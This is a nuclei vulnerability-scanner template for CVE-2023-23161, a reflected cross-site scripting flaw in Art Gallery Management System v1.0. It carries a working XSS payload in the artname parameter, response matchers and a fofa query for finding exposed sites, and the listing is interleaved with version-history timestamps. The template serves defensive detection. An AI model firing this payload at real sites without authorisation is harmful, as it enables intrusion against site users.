nuclei-templates/http/cves/2023/CVE-2023-23161.yaml

57 lines
2.3 KiB
YAML
Raw Normal View History

2023-07-22 06:07:25 +00:00
id: CVE-2023-23161
info:
2023-07-26 05:55:48 +00:00
name: Art Gallery Management System Project v1.0 - Cross-Site Scripting
2023-07-22 06:07:25 +00:00
author: ctflearner
severity: medium
2023-07-26 05:55:48 +00:00
description: |
A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-07-22 06:07:25 +00:00
reference:
- https://www.exploit-db.com/exploits/51214
- https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
- https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-23161
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
2023-07-22 06:07:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-23161
cwe-id: CWE-79
epss-score: 0.00107
epss-percentile: 0.43113
cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:*
2023-07-22 06:07:25 +00:00
metadata:
2023-07-26 05:55:48 +00:00
verified: true
2023-09-06 11:43:37 +00:00
max-request: 1
vendor: phpgurukul
2023-07-22 08:02:10 +00:00
product: art_gallery_management_system
2023-09-06 11:43:37 +00:00
fofa-query: title="Art Gallery Management System"
2023-12-05 09:50:33 +00:00
tags: packetstorm,cve,cve2023,art,gallery,xss,art_gallery_management_system_project
2023-07-22 06:07:25 +00:00
http:
- method: GET
path:
2023-07-26 05:55:48 +00:00
- '{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E'
2023-07-22 06:07:25 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-07-26 05:55:48 +00:00
- 'center"><img src=1 onerror=alert(document.domain)>'
- 'Art Type'
condition: and
2023-07-22 06:07:25 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402201ba519b83c6cc7b0cfc747995fe1fd5f43a790e7343908a60e658011a15c1d47022007bf702fa8235e432d185f8b223570caa526cdaac6c9b74eb53862955c19aca1:922c64590222798bb761d5b6d8e72950